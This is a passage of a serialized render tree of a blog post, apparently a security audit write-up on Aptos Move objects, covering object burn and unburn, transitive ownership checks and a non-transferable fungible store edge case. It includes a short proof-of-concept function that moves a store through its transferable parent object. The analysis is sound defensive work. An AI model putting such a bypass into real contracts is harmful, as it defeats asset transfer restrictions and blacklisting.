signer",{"type":28,"tag":116,"props":63620,"children":63621},{"style":370},[63622],{"type":33,"value":3151},{"type":28,"tag":116,"props":63624,"children":63625},{"style":282},[63626],{"type":33,"value":6881},{"type":28,"tag":116,"props":63628,"children":63629},{"style":266},[63630],{"type":33,"value":313},{"type":28,"tag":116,"props":63632,"children":63633},{"style":272},[63634],{"type":33,"value":15271},{"type":28,"tag":116,"props":63636,"children":63637},{"style":266},[63638],{"type":33,"value":895},{"type":28,"tag":116,"props":63640,"children":63641},{"class":245,"line":293},[63642,63646,63650,63655,63659,63663,63667,63672,63676,63680,63684],{"type":28,"tag":116,"props":63643,"children":63644},{"style":282},[63645],{"type":33,"value":61963},{"type":28,"tag":116,"props":63647,"children":63648},{"style":266},[63649],{"type":33,"value":313},{"type":28,"tag":116,"props":63651,"children":63652},{"style":282},[63653],{"type":33,"value":63654},"is_owner",{"type":28,"tag":116,"props":63656,"children":63657},{"style":266},[63658],{"type":33,"value":313},{"type":28,"tag":116,"props":63660,"children":63661},{"style":272},[63662],{"type":33,"value":62529},{"type":28,"tag":116,"props":63664,"children":63665},{"style":266},[63666],{"type":33,"value":825},{"type":28,"tag":116,"props":63668,"children":63669},{"style":272},[63670],{"type":33,"value":63671},"original_owner",{"type":28,"tag":116,"props":63673,"children":63674},{"style":266},[63675],{"type":33,"value":62552},{"type":28,"tag":116,"props":63677,"children":63678},{"style":370},[63679],{"type":33,"value":3151},{"type":28,"tag":116,"props":63681,"children":63682},{"style":282},[63683],{"type":33,"value":63438},{"type":28,"tag":116,"props":63685,"children":63686},{"style":266},[63687],{"type":33,"value":63688},"(ENOT_OBJECT_OWNER));\n",{"type":28,"tag":116,"props":63690,"children":63691},{"class":245,"line":361},[63692,63696,63701,63705,63709,63713],{"type":28,"tag":116,"props":63693,"children":63694},{"style":376},[63695],{"type":33,"value":2672},{"type":28,"tag":116,"props":63697,"children":63698},{"style":272},[63699],{"type":33,"value":63700}," object_addr",{"type":28,"tag":116,"props":63702,"children":63703},{"style":370},[63704],{"type":33,"value":2226},{"type":28,"tag":116,"props":63706,"children":63707},{"style":272},[63708],{"type":33,"value":62113},{"type":28,"tag":116,"props":63710,"children":63711},{"style":370},[63712],{"type":33,"value":141},{"type":28,"tag":116,"props":63714,"children":63715},{"style":266},[63716],{"type":33,"value":63717},"inner;\n",{"type":28,"tag":116,"props":63719,"children":63720},{"class":245,"line":387},[63721,63725,63729,63733,63738,63742,63747,63751,63756,63760,63764],{"type":28,"tag":116,"props":63722,"children":63723},{"style":282},[63724],{"type":33,"value":62716},{"type":28,"tag":116,"props":63726,"children":63727},{"style":266},[63728],{"type":33,"value":313},{"type":28,"tag":116,"props":63730,"children":63731},{"style":370},[63732],{"type":33,"value":2780},{"type":28,"tag":116,"props":63734,"children":63735},{"style":282},[63736],{"type":33,"value":63737},"create_signer",{"type":28,"tag":116,"props":63739,"children":63740},{"style":266},[63741],{"type":33,"value":313},{"type":28,"tag":116,"props":63743,"children":63744},{"style":272},[63745],{"type":33,"value":63746},"object_addr",{"type":28,"tag":116,"props":63748,"children":63749},{"style":266},[63750],{"type":33,"value":14840},{"type":28,"tag":116,"props":63752,"children":63753},{"style":339},[63754],{"type":33,"value":63755},"TombStone",{"type":28,"tag":116,"props":63757,"children":63758},{"style":266},[63759],{"type":33,"value":9254},{"type":28,"tag":116,"props":63761,"children":63762},{"style":272},[63763],{"type":33,"value":63671},{"type":28,"tag":116,"props":63765,"children":63766},{"style":266},[63767],{"type":33,"value":1134},{"type":28,"tag":116,"props":63769,"children":63770},{"class":245,"line":400},[63771,63776,63780,63784],{"type":28,"tag":116,"props":63772,"children":63773},{"style":282},[63774],{"type":33,"value":63775},"    transfer_raw_inner",{"type":28,"tag":116,"props":63777,"children":63778},{"style":266},[63779],{"type":33,"value":313},{"type":28,"tag":116,"props":63781,"children":63782},{"style":272},[63783],{"type":33,"value":63746},{"type":28,"tag":116,"props":63785,"children":63786},{"style":266},[63787],{"type":33,"value":63788},", BURN_ADDRESS);\n",{"type":28,"tag":116,"props":63790,"children":63791},{"class":245,"line":614},[63792],{"type":28,"tag":116,"props":63793,"children":63794},{"style":266},[63795],{"type":33,"value":406},{"type":28,"tag":29,"props":63797,"children":63798},{},[63799,63805,63807,63812,63813,63820,63822,63827],{"type":28,"tag":98,"props":63800,"children":63802},{"className":63801},[],[63803],{"type":33,"value":63804},"unburn",{"type":33,"value":63806}," is a way to restore the previous object owner. In a past audit, this mechanism could be exploited to bypass fungible store owner blacklisting by temporarily setting ownership to the unblacklisted ",{"type":28,"tag":98,"props":63808,"children":63810},{"className":63809},[],[63811],{"type":33,"value":63491},{"type":33,"value":18195},{"type":28,"tag":87,"props":63814,"children":63817},{"href":63815,"rel":63816},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-99.md",[91],[63818],{"type":33,"value":63819},"AIP-99",{"type":33,"value":63821}," is a proposal to roll back the ",{"type":28,"tag":98,"props":63823,"children":63825},{"className":63824},[],[63826],{"type":33,"value":63483},{"type":33,"value":63828}," feature, but previously burned objects will remain restorable.",{"type":28,"tag":107,"props":63830,"children":63831},{},[63832],{"type":28,"tag":29,"props":63833,"children":63834},{},[63835,63837,63841],{"type":33,"value":63836},"This ",{"type":28,"tag":116,"props":63838,"children":63839},{},[63840],{"type":33,"value":63819},{"type":33,"value":63842}," seeks to disable safe object burn, as it caused extra complexity, and sometimes unexpected consequences. As a result of this AIP, users will still be able to unburn their burnt objects, but will not be able to burn any new objects.",{"type":28,"tag":29,"props":63844,"children":63845},{},[63846,63848,63854,63856,63861,63863,63868],{"type":33,"value":63847},"Another important thing is that ",{"type":28,"tag":98,"props":63849,"children":63851},{"className":63850},[],[63852],{"type":33,"value":63853},"fungible_asset::set_untransferable",{"type":33,"value":63855}," can be used to make all new ",{"type":28,"tag":98,"props":63857,"children":63859},{"className":63858},[],[63860],{"type":33,"value":62199},{"type":33,"value":63862}," for this asset untransferable, preventing ownership changes. However, this restriction doesn't apply to the parent object, allowing a transferable parent to be moved even if it owns a non-transferable ",{"type":28,"tag":98,"props":63864,"children":63866},{"className":63865},[],[63867],{"type":33,"value":61695},{"type":33,"value":141},{"type":28,"tag":29,"props":63870,"children":63871},{},[63872,63874,63879,63881,63887,63889,63894,63896,63901],{"type":33,"value":63873},"Do we need to care about this case? We do, because ownership is transitive. If entity X owns an object that owns a ",{"type":28,"tag":98,"props":63875,"children":63877},{"className":63876},[],[63878],{"type":33,"value":61695},{"type":33,"value":63880},", X can withdraw from that store. This is because ",{"type":28,"tag":98,"props":63882,"children":63884},{"className":63883},[],[63885],{"type":33,"value":63886},"fungible_asset::withdraw",{"type":33,"value":63888}," uses ",{"type":28,"tag":98,"props":63890,"children":63892},{"className":63891},[],[63893],{"type":33,"value":63213},{"type":33,"value":63895}," to verify both direct and indirect ownership of the ",{"type":28,"tag":98,"props":63897,"children":63899},{"className":63898},[],[63900],{"type":33,"value":61695},{"type":33,"value":49796},{"type":28,"tag":234,"props":63903,"children":63905},{"className":2652,"code":63904,"language":2651,"meta":7,"style":7},"fun verify_ungated_and_descendant(owner: address, destination: address) acquires ObjectCore {\n        [...]\n    while (owner != current_address) {\n        count = count + 1;\n        [...]\n        assert!(\n            exists\u003CObjectCore>(current_address),\n            error::permission_denied(ENOT_OBJECT_OWNER),\n        );\n        let object = borrow_global\u003CObjectCore>(current_address);\n        current_address = object.owner;\n    };\n}\n",[63906],{"type":28,"tag":98,"props":63907,"children":63908},{"__ignoreMap":7},[63909,63970,63986,64016,64045,64060,64072,64102,64123,64130,64170,64195,64202],{"type":28,"tag":116,"props":63910,"children":63911},{"class":245,"line":246},[63912,63916,63921,63925,63929,63933,63937,63941,63946,63950,63954,63958,63962,63966],{"type":28,"tag":116,"props":63913,"children":63914},{"style":272},[63915],{"type":33,"value":6779},{"type":28,"tag":116,"props":63917,"children":63918},{"style":282},[63919],{"type":33,"value":63920}," verify_ungated_and_descendant",{"type":28,"tag":116,"props":63922,"children":63923},{"style":266},[63924],{"type":33,"value":313},{"type":28,"tag":116,"props":63926,"children":63927},{"style":272},[63928],{"type":33,"value":15271},{"type":28,"tag":116,"props":63930,"children":63931},{"style":370},[63932],{"type":33,"value":4160},{"type":28,"tag":116,"props":63934,"children":63935},{"style":272},[63936],{"type":33,"value":5921},{"type":28,"tag":116,"props":63938,"children":63939},{"style":266},[63940],{"type":33,"value":825},{"type":28,"tag":116,"props":63942,"children":63943},{"style":272},[63944],{"type":33,"value":63945},"destination",{"type":28,"tag":116,"props":63947,"children":63948},{"style":370},[63949],{"type":33,"value":4160},{"type":28,"tag":116,"props":63951,"children":63952},{"style":272},[63953],{"type":33,"value":5921},{"type":28,"tag":116,"props":63955,"children":63956},{"style":266},[63957],{"type":33,"value":1609},{"type":28,"tag":116,"props":63959,"children":63960},{"style":272},[63961],{"type":33,"value":6015},{"type":28,"tag":116,"props":63963,"children":63964},{"style":339},[63965],{"type":33,"value":63593},{"type":28,"tag":116,"props":63967,"children":63968},{"style":266},[63969],{"type":33,"value":1291},{"type":28,"tag":116,"props":63971,"children":63972},{"class":245,"line":256},[63973,63978,63982],{"type":28,"tag":116,"props":63974,"children":63975},{"style":266},[63976],{"type":33,"value":63977},"        [",{"type":28,"tag":116,"props":63979,"children":63980},{"style":370},[63981],{"type":33,"value":9259},{"type":28,"tag":116,"props":63983,"children":63984},{"style":266},[63985],{"type":33,"value":11440},{"type":28,"tag":116,"props":63987,"children":63988},{"class":245,"line":293},[63989,63994,63998,64002,64007,64012],{"type":28,"tag":116,"props":63990,"children":63991},{"style":260},[63992],{"type":33,"value":63993},"    while",{"type":28,"tag":116,"props":63995,"children":63996},{"style":266},[63997],{"type":33,"value":269},{"type":28,"tag":116,"props":63999,"children":64000},{"style":272},[64001],{"type":33,"value":15271},{"type":28,"tag":116,"props":64003,"children":64004},{"style":370},[64005],{"type":33,"value":64006}," !=",{"type":28,"tag":116,"props":64008,"children":64009},{"style":272},[64010],{"type":33,"value":64011}," current_address",{"type":28,"tag":116,"props":64013,"children":64014},{"style":266},[64015],{"type":33,"value":844},{"type":28,"tag":116,"props":64017,"children":64018},{"class":245,"line":361},[64019,64024,64028,64033,64037,64041],{"type":28,"tag":116,"props":64020,"children":64021},{"style":272},[64022],{"type":33,"value":64023},"        count",{"type":28,"tag":116,"props":64025,"children":64026},{"style":370},[64027],{"type":33,"value":2226},{"type":28,"tag":116,"props":64029,"children":64030},{"style":272},[64031],{"type":33,"value":64032}," count",{"type":28,"tag":116,"props":64034,"children":64035},{"style":370},[64036],{"type":33,"value":2258},{"type":28,"tag":116,"props":64038,"children":64039},{"style":350},[64040],{"type":33,"value":4192},{"type":28,"tag":116,"props":64042,"children":64043},{"style":266},[64044],{"type":33,"value":384},{"type":28,"tag":116,"props":64046,"children":64047},{"class":245,"line":387},[64048,64052,64056],{"type":28,"tag":116,"props":64049,"children":64050},{"style":266},[64051],{"type":33,"value":63977},{"type":28,"tag":116,"props":64053,"children":64054},{"style":370},[64055],{"type":33,"value":9259},{"type":28,"tag":116,"props":64057,"children":64058},{"style":266},[64059],{"type":33,"value":11440},{"type":28,"tag":116,"props":64061,"children":64062},{"class":245,"line":400},[64063,64068],{"type":28,"tag":116,"props":64064,"children":64065},{"style":282},[64066],{"type":33,"value":64067},"        assert!",{"type":28,"tag":116,"props":64069,"children":64070},{"style":266},[64071],{"type":33,"value":3133},{"type":28,"tag":116,"props":64073,"children":64074},{"class":245,"line":614},[64075,64080,64084,64089,64093,64098],{"type":28,"tag":116,"props":64076,"children":64077},{"style":272},[64078],{"type":33,"value":64079},"            exists",{"type":28,"tag":116,"props":64081,"children":64082},{"style":266},[64083],{"type":33,"value":514},{"type":28,"tag":116,"props":64085,"children":64086},{"style":339},[64087],{"type":33,"value":64088},"ObjectCore",{"type":28,"tag":116,"props":64090,"children":64091},{"style":266},[64092],{"type":33,"value":7282},{"type":28,"tag":116,"props":64094,"children":64095},{"style":272},[64096],{"type":33,"value":64097},"current_address",{"type":28,"tag":116,"props":64099,"children":64100},{"style":266},[64101],{"type":33,"value":6408},{"type":28,"tag":116,"props":64103,"children":64104},{"class":245,"line":631},[64105,64110,64114,64118],{"type":28,"tag":116,"props":64106,"children":64107},{"style":266},[64108],{"type":33,"value":64109},"            error",{"type":28,"tag":116,"props":64111,"children":64112},{"style":370},[64113],{"type":33,"value":3151},{"type":28,"tag":116,"props":64115,"children":64116},{"style":282},[64117],{"type":33,"value":63438},{"type":28,"tag":116,"props":64119,"children":64120},{"style":266},[64121],{"type":33,"value":64122},"(ENOT_OBJECT_OWNER),\n",{"type":28,"tag":116,"props":64124,"children":64125},{"class":245,"line":665},[64126],{"type":28,"tag":116,"props":64127,"children":64128},{"style":266},[64129],{"type":33,"value":7415},{"type":28,"tag":116,"props":64131,"children":64132},{"class":245,"line":713},[64133,64137,64141,64145,64150,64154,64158,64162,64166],{"type":28,"tag":116,"props":64134,"children":64135},{"style":376},[64136],{"type":33,"value":2736},{"type":28,"tag":116,"props":64138,"children":64139},{"style":272},[64140],{"type":33,"value":62113},{"type":28,"tag":116,"props":64142,"children":64143},{"style":370},[64144],{"type":33,"value":2226},{"type":28,"tag":116,"props":64146,"children":64147},{"style":272},[64148],{"type":33,"value":64149}," borrow_global",{"type":28,"tag":116,"props":64151,"children":64152},{"style":266},[64153],{"type":33,"value":514},{"type":28,"tag":116,"props":64155,"children":64156},{"style":339},[64157],{"type":33,"value":64088},{"type":28,"tag":116,"props":64159,"children":64160},{"style":266},[64161],{"type":33,"value":7282},{"type":28,"tag":116,"props":64163,"children":64164},{"style":272},[64165],{"type":33,"value":64097},{"type":28,"tag":116,"props":64167,"children":64168},{"style":266},[64169],{"type":33,"value":895},{"type":28,"tag":116,"props":64171,"children":64172},{"class":245,"line":750},[64173,64178,64182,64186,64190],{"type":28,"tag":116,"props":64174,"children":64175},{"style":272},[64176],{"type":33,"value":64177},"        current_address",{"type":28,"tag":116,"props":64179,"children":64180},{"style":370},[64181],{"type":33,"value":2226},{"type":28,"tag":116,"props":64183,"children":64184},{"style":272},[64185],{"type":33,"value":62113},{"type":28,"tag":116,"props":64187,"children":64188},{"style":370},[64189],{"type":33,"value":141},{"type":28,"tag":116,"props":64191,"children":64192},{"style":266},[64193],{"type":33,"value":64194},"owner;\n",{"type":28,"tag":116,"props":64196,"children":64197},{"class":245,"line":779},[64198],{"type":28,"tag":116,"props":64199,"children":64200},{"style":266},[64201],{"type":33,"value":38618},{"type":28,"tag":116,"props":64203,"children":64204},{"class":245,"line":796},[64205],{"type":28,"tag":116,"props":64206,"children":64207},{"style":266},[64208],{"type":33,"value":406},{"type":28,"tag":29,"props":64210,"children":64211},{},[64212,64214,64219],{"type":33,"value":64213},"This could allow for bypassing assumptions about ",{"type":28,"tag":98,"props":64215,"children":64217},{"className":64216},[],[64218],{"type":33,"value":61695},{"type":33,"value":64220}," true ownership and its non-transferability.",{"type":28,"tag":234,"props":64222,"children":64224},{"className":2652,"code":64223,"language":2651,"meta":7,"style":7},"public fun untransferable_transfer(caller: &signer, receipient: address) {\n    let constructor_ref = object::create_object(signer::address_of(caller));\n    let object_addr = object::address_from_constructor_ref(&constructor_ref);\n    let store = primary_fungible_store::ensure_primary_store_exists(object_addr, get_metadata());\n\n    object::transfer_raw(caller, object_addr, receipient);\n    //receipient can interact with store by using their signer\n}\n",[64225],{"type":28,"tag":98,"props":64226,"children":64227},{"__ignoreMap":7},[64228,64286,64339,64383,64431,64438,64483,64491],{"type":28,"tag":116,"props":64229,"children":64230},{"class":245,"line":246},[64231,64235,64239,64244,64248,64253,64257,64261,64265,64269,64274,64278,64282],{"type":28,"tag":116,"props":64232,"children":64233},{"style":272},[64234],{"type":33,"value":61294},{"type":28,"tag":116,"props":64236,"children":64237},{"style":272},[64238],{"type":33,"value":5878},{"type":28,"tag":116,"props":64240,"children":64241},{"style":282},[64242],{"type":33,"value":64243}," untransferable_transfer",{"type":28,"tag":116,"props":64245,"children":64246},{"style":266},[64247],{"type":33,"value":313},{"type":28,"tag":116,"props":64249,"children":64250},{"style":272},[64251],{"type":33,"value":64252},"caller",{"type":28,"tag":116,"props":64254,"children":64255},{"style":370},[64256],{"type":33,"value":4160},{"type":28,"tag":116,"props":64258,"children":64259},{"style":370},[64260],{"type":33,"value":6813},{"type":28,"tag":116,"props":64262,"children":64263},{"style":272},[64264],{"type":33,"value":6818},{"type":28,"tag":116,"props":64266,"children":64267},{"style":266},[64268],{"type":33,"value":825},{"type":28,"tag":116,"props":64270,"children":64271},{"style":272},[64272],{"type":33,"value":64273},"receipient",{"type":28,"tag":116,"props":64275,"children":64276},{"style":370},[64277],{"type":33,"value":4160},{"type":28,"tag":116,"props":64279,"children":64280},{"style":272},[64281],{"type":33,"value":5921},{"type":28,"tag":116,"props":64283,"children":64284},{"style":266},[64285],{"type":33,"value":844},{"type":28,"tag":116,"props":64287,"children":64288},{"class":245,"line":256},[64289,64293,64298,64302,64306,64310,64315,64319,64323,64327,64331,64335],{"type":28,"tag":116,"props":64290,"children":64291},{"style":376},[64292],{"type":33,"value":2672},{"type":28,"tag":116,"props":64294,"children":64295},{"style":272},[64296],{"type":33,"value":64297}," constructor_ref",{"type":28,"tag":116,"props":64299,"children":64300},{"style":370},[64301],{"type":33,"value":2226},{"type":28,"tag":116,"props":64303,"children":64304},{"style":266},[64305],{"type":33,"value":62113},{"type":28,"tag":116,"props":64307,"children":64308},{"style":370},[64309],{"type":33,"value":3151},{"type":28,"tag":116,"props":64311,"children":64312},{"style":282},[64313],{"type":33,"value":64314},"create_object",{"type":28,"tag":116,"props":64316,"children":64317},{"style":266},[64318],{"type":33,"value":6872},{"type":28,"tag":116,"props":64320,"children":64321},{"style":370},[64322],{"type":33,"value":3151},{"type":28,"tag":116,"props":64324,"children":64325},{"style":282},[64326],{"type":33,"value":6881},{"type":28,"tag":116,"props":64328,"children":64329},{"style":266},[64330],{"type":33,"value":313},{"type":28,"tag":116,"props":64332,"children":64333},{"style":272},[64334],{"type":33,"value":64252},{"type":28,"tag":116,"props":64336,"children":64337},{"style":266},[64338],{"type":33,"value":1929},{"type":28,"tag":116,"props":64340,"children":64341},{"class":245,"line":293},[64342,64346,64350,64354,64358,64362,64367,64371,64375,64379],{"type":28,"tag":116,"props":64343,"children":64344},{"style":376},[64345],{"type":33,"value":2672},{"type":28,"tag":116,"props":64347,"children":64348},{"style":272},[64349],{"type":33,"value":63700},{"type":28,"tag":116,"props":64351,"children":64352},{"style":370},[64353],{"type":33,"value":2226},{"type":28,"tag":116,"props":64355,"children":64356},{"style":266},[64357],{"type":33,"value":62113},{"type":28,"tag":116,"props":64359,"children":64360},{"style":370},[64361],{"type":33,"value":3151},{"type":28,"tag":116,"props":64363,"children":64364},{"style":282},[64365],{"type":33,"value":64366},"address_from_constructor_ref",{"type":28,"tag":116,"props":64368,"children":64369},{"style":266},[64370],{"type":33,"value":313},{"type":28,"tag":116,"props":64372,"children":64373},{"style":370},[64374],{"type":33,"value":2780},{"type":28,"tag":116,"props":64376,"children":64377},{"style":272},[64378],{"type":33,"value":62547},{"type":28,"tag":116,"props":64380,"children":64381},{"style":266},[64382],{"type":33,"value":895},{"type":28,"tag":116,"props":64384,"children":64385},{"class":245,"line":361},[64386,64390,64394,64398,64403,64407,64411,64415,64419,64423,64427],{"type":28,"tag":116,"props":64387,"children":64388},{"style":376},[64389],{"type":33,"value":2672},{"type":28,"tag":116,"props":64391,"children":64392},{"style":272},[64393],{"type":33,"value":5502},{"type":28,"tag":116,"props":64395,"children":64396},{"style":370},[64397],{"type":33,"value":2226},{"type":28,"tag":116,"props":64399,"children":64400},{"style":266},[64401],{"type":33,"value":64402}," primary_fungible_store",{"type":28,"tag":116,"props":64404,"children":64405},{"style":370},[64406],{"type":33,"value":3151},{"type":28,"tag":116,"props":64408,"children":64409},{"style":282},[64410],{"type":33,"value":62439},{"type":28,"tag":116,"props":64412,"children":64413},{"style":266},[64414],{"type":33,"value":313},{"type":28,"tag":116,"props":64416,"children":64417},{"style":272},[64418],{"type":33,"value":63746},{"type":28,"tag":116,"props":64420,"children":64421},{"style":266},[64422],{"type":33,"value":825},{"type":28,"tag":116,"props":64424,"children":64425},{"style":282},[64426],{"type":33,"value":62395},{"type":28,"tag":116,"props":64428,"children":64429},{"style":266},[64430],{"type":33,"value":1577},{"type":28,"tag":116,"props":64432,"children":64433},{"class":245,"line":387},[64434],{"type":28,"tag":116,"props":64435,"children":64436},{"emptyLinePlaceholder":19},[64437],{"type":33,"value":1044},{"type":28,"tag":116,"props":64439,"children":64440},{"class":245,"line":400},[64441,64446,64450,64455,64459,64463,64467,64471,64475,64479],{"type":28,"tag":116,"props":64442,"children":64443},{"style":266},[64444],{"type":33,"value":64445},"    object",{"type":28,"tag":116,"props":64447,"children":64448},{"style":370},[64449],{"type":33,"value":3151},{"type":28,"tag":116,"props":64451,"children":64452},{"style":282},[64453],{"type":33,"value":64454},"transfer_raw",{"type":28,"tag":116,"props":64456,"children":64457},{"style":266},[64458],{"type":33,"value":313},{"type":28,"tag":116,"props":64460,"children":64461},{"style":272},[64462],{"type":33,"value":64252},{"type":28,"tag":116,"props":64464,"children":64465},{"style":266},[64466],{"type":33,"value":825},{"type":28,"tag":116,"props":64468,"children":64469},{"style":272},[64470],{"type":33,"value":63746},{"type":28,"tag":116,"props":64472,"children":64473},{"style":266},[64474],{"type":33,"value":825},{"type":28,"tag":116,"props":64476,"children":64477},{"style":272},[64478],{"type":33,"value":64273},{"type":28,"tag":116,"props":64480,"children":64481},{"style":266},[64482],{"type":33,"value":895},{"type":28,"tag":116,"props":64484,"children":64485},{"class":245,"line":614},[64486],{"type":28,"tag":116,"props":64487,"children":64488},{"style":250},[64489],{"type":33,"value":64490},"    //receipient can interact with store by using their signer\n",{"type":28,"tag":116,"props":64492,"children":64493},{"class":245,"line":631},[64494],{"type":28,"tag":116,"props":64495,"children":64496},{"style":266},[64497],{"type":33,"value":406},{"type":28,"tag":29,"props":64499,"children":64500},{},[64501,64503,64510],{"type":33,"value":64502},"The ownership transfer issue also showed up during our review of the fungible asset standard, where we identified an interesting ",{"type":28,"tag":87,"props":64504,"children":64507},{"href":64505,"rel":64506},"https://github.com/aptos-labs/aptos-core/commit/e8c5e4bd03930d25f0dbec9529680fac36eb2fa6",[91],[64508],{"type":33,"value":64509},"edge case",{"type":33,"value":64511}," involving the transfer of a non-transferable fungible store.",{"type":28,"tag":234,"props":64513,"children":64515},{"className":2652,"code":64514,"language":2651,"meta":7,"style":7},"public fun transfer_with_ref(ref: LinearTransferRef, to: address) acquires ObjectCore {\n    assert!(!exists\u003CUntransferable>(ref.self), error::permission_denied(ENOT_MOVABLE));\n    let object = borrow_global_mut\u003CObjectCore>(ref.self);\n    assert!(\n        object.owner == ref.owner,\n        error::permission_denied(ENOT_OBJECT_OWNER),\n    );\n    \n    [...]\n    \n    object.owner = to;\n}\n",[64516],{"type":28,"tag":98,"props":64517,"children":64518},{"__ignoreMap":7},[64519,64584,64645,64692,64703,64738,64758,64765,64772,64787,64794,64822],{"type":28,"tag":116,"props":64520,"children":64521},{"class":245,"line":246},[64522,64526,64530,64535,64539,64543,64547,64552,64556,64560,64564,64568,64572,64576,64580],{"type":28,"tag":116,"props":64523,"children":64524},{"style":272},[64525],{"type":33,"value":61294},{"type":28,"tag":116,"props":64527,"children":64528},{"style":272},[64529],{"type":33,"value":5878},{"type":28,"tag":116,"props":64531,"children":64532},{"style":282},[64533],{"type":33,"value":64534}," transfer_with_ref",{"type":28,"tag":116,"props":64536,"children":64537},{"style":266},[64538],{"type":33,"value":313},{"type":28,"tag":116,"props":64540,"children":64541},{"style":376},[64542],{"type":33,"value":62956},{"type":28,"tag":116,"props":64544,"children":64545},{"style":370},[64546],{"type":33,"value":4160},{"type":28,"tag":116,"props":64548,"children":64549},{"style":339},[64550],{"type":33,"value":64551}," LinearTransferRef",{"type":28,"tag":116,"props":64553,"children":64554},{"style":266},[64555],{"type":33,"value":825},{"type":28,"tag":116,"props":64557,"children":64558},{"style":272},[64559],{"type":33,"value":32365},{"type":28,"tag":116,"props":64561,"children":64562},{"style":370},[64563],{"type":33,"value":4160},{"type":28,"tag":116,"props":64565,"children":64566},{"style":272},[64567],{"type":33,"value":5921},{"type":28,"tag":116,"props":64569,"children":64570},{"style":266},[64571],{"type":33,"value":1609},{"type":28,"tag":116,"props":64573,"children":64574},{"style":272},[64575],{"type":33,"value":6015},{"type":28,"tag":116,"props":64577,"children":64578},{"style":339},[64579],{"type":33,"value":63593},{"type":28,"tag":116,"props":64581,"children":64582},{"style":266},[64583],{"type":33,"value":1291},{"type":28,"tag":116,"props":64585,"children":64586},{"class":245,"line":256},[64587,64591,64595,64599,64603,64607,64612,64616,64620,64624,64628,64632,64636,64640],{"type":28,"tag":116,"props":64588,"children":64589},{"style":282},[64590],{"type":33,"value":61963},{"type":28,"tag":116,"props":64592,"children":64593},{"style":266},[64594],{"type":33,"value":313},{"type":28,"tag":116,"props":64596,"children":64597},{"style":370},[64598],{"type":33,"value":20285},{"type":28,"tag":116,"props":64600,"children":64601},{"style":272},[64602],{"type":33,"value":6376},{"type":28,"tag":116,"props":64604,"children":64605},{"style":266},[64606],{"type":33,"value":514},{"type":28,"tag":116,"props":64608,"children":64609},{"style":339},[64610],{"type":33,"value":64611},"Untransferable",{"type":28,"tag":116,"props":64613,"children":64614},{"style":266},[64615],{"type":33,"value":7282},{"type":28,"tag":116,"props":64617,"children":64618},{"style":376},[64619],{"type":33,"value":62956},{"type":28,"tag":116,"props":64621,"children":64622},{"style":370},[64623],{"type":33,"value":141},{"type":28,"tag":116,"props":64625,"children":64626},{"style":376},[64627],{"type":33,"value":13379},{"type":28,"tag":116,"props":64629,"children":64630},{"style":266},[64631],{"type":33,"value":62552},{"type":28,"tag":116,"props":64633,"children":64634},{"style":370},[64635],{"type":33,"value":3151},{"type":28,"tag":116,"props":64637,"children":64638},{"style":282},[64639],{"type":33,"value":63438},{"type":28,"tag":116,"props":64641,"children":64642},{"style":266},[64643],{"type":33,"value":64644},"(ENOT_MOVABLE));\n",{"type":28,"tag":116,"props":64646,"children":64647},{"class":245,"line":293},[64648,64652,64656,64660,64664,64668,64672,64676,64680,64684,64688],{"type":28,"tag":116,"props":64649,"children":64650},{"style":376},[64651],{"type":33,"value":2672},{"type":28,"tag":116,"props":64653,"children":64654},{"style":272},[64655],{"type":33,"value":62113},{"type":28,"tag":116,"props":64657,"children":64658},{"style":370},[64659],{"type":33,"value":2226},{"type":28,"tag":116,"props":64661,"children":64662},{"style":272},[64663],{"type":33,"value":7268},{"type":28,"tag":116,"props":64665,"children":64666},{"style":266},[64667],{"type":33,"value":514},{"type":28,"tag":116,"props":64669,"children":64670},{"style":339},[64671],{"type":33,"value":64088},{"type":28,"tag":116,"props":64673,"children":64674},{"style":266},[64675],{"type":33,"value":7282},{"type":28,"tag":116,"props":64677,"children":64678},{"style":376},[64679],{"type":33,"value":62956},{"type":28,"tag":116,"props":64681,"children":64682},{"style":370},[64683],{"type":33,"value":141},{"type":28,"tag":116,"props":64685,"children":64686},{"style":376},[64687],{"type":33,"value":13379},{"type":28,"tag":116,"props":64689,"children":64690},{"style":266},[64691],{"type":33,"value":895},{"type":28,"tag":116,"props":64693,"children":64694},{"class":245,"line":361},[64695,64699],{"type":28,"tag":116,"props":64696,"children":64697},{"style":282},[64698],{"type":33,"value":61963},{"type":28,"tag":116,"props":64700,"children":64701},{"style":266},[64702],{"type":33,"value":3133},{"type":28,"tag":116,"props":64704,"children":64705},{"class":245,"line":387},[64706,64711,64715,64720,64724,64729,64733],{"type":28,"tag":116,"props":64707,"children":64708},{"style":272},[64709],{"type":33,"value":64710},"        object",{"type":28,"tag":116,"props":64712,"children":64713},{"style":370},[64714],{"type":33,"value":141},{"type":28,"tag":116,"props":64716,"children":64717},{"style":266},[64718],{"type":33,"value":64719},"owner ",{"type":28,"tag":116,"props":64721,"children":64722},{"style":370},[64723],{"type":33,"value":2340},{"type":28,"tag":116,"props":64725,"children":64726},{"style":376},[64727],{"type":33,"value":64728}," ref",{"type":28,"tag":116,"props":64730,"children":64731},{"style":370},[64732],{"type":33,"value":141},{"type":28,"tag":116,"props":64734,"children":64735},{"style":266},[64736],{"type":33,"value":64737},"owner,\n",{"type":28,"tag":116,"props":64739,"children":64740},{"class":245,"line":400},[64741,64746,64750,64754],{"type":28,"tag":116,"props":64742,"children":64743},{"style":266},[64744],{"type":33,"value":64745},"        error",{"type":28,"tag":116,"props":64747,"children":64748},{"style":370},[64749],{"type":33,"value":3151},{"type":28,"tag":116,"props":64751,"children":64752},{"style":282},[64753],{"type":33,"value":63438},{"type":28,"tag":116,"props":64755,"children":64756},{"style":266},[64757],{"type":33,"value":64122},{"type":28,"tag":116,"props":64759,"children":64760},{"class":245,"line":614},[64761],{"type":28,"tag":116,"props":64762,"children":64763},{"style":266},[64764],{"type":33,"value":43279},{"type":28,"tag":116,"props":64766,"children":64767},{"class":245,"line":631},[64768],{"type":28,"tag":116,"props":64769,"children":64770},{"style":266},[64771],{"type":33,"value":61405},{"type":28,"tag":116,"props":64773,"children":64774},{"class":245,"line":665},[64775,64779,64783],{"type":28,"tag":116,"props":64776,"children":64777},{"style":266},[64778],{"type":33,"value":62337},{"type":28,"tag":116,"props":64780,"children":64781},{"style":370},[64782],{"type":33,"value":9259},{"type":28,"tag":116,"props":64784,"children":64785},{"style":266},[64786],{"type":33,"value":11440},{"type":28,"tag":116,"props":64788,"children":64789},{"class":245,"line":713},[64790],{"type":28,"tag":116,"props":64791,"children":64792},{"style":266},[64793],{"type":33,"value":61405},{"type":28,"tag":116,"props":64795,"children":64796},{"class":245,"line":750},[64797,64801,64805,64809,64813,64818],{"type":28,"tag":116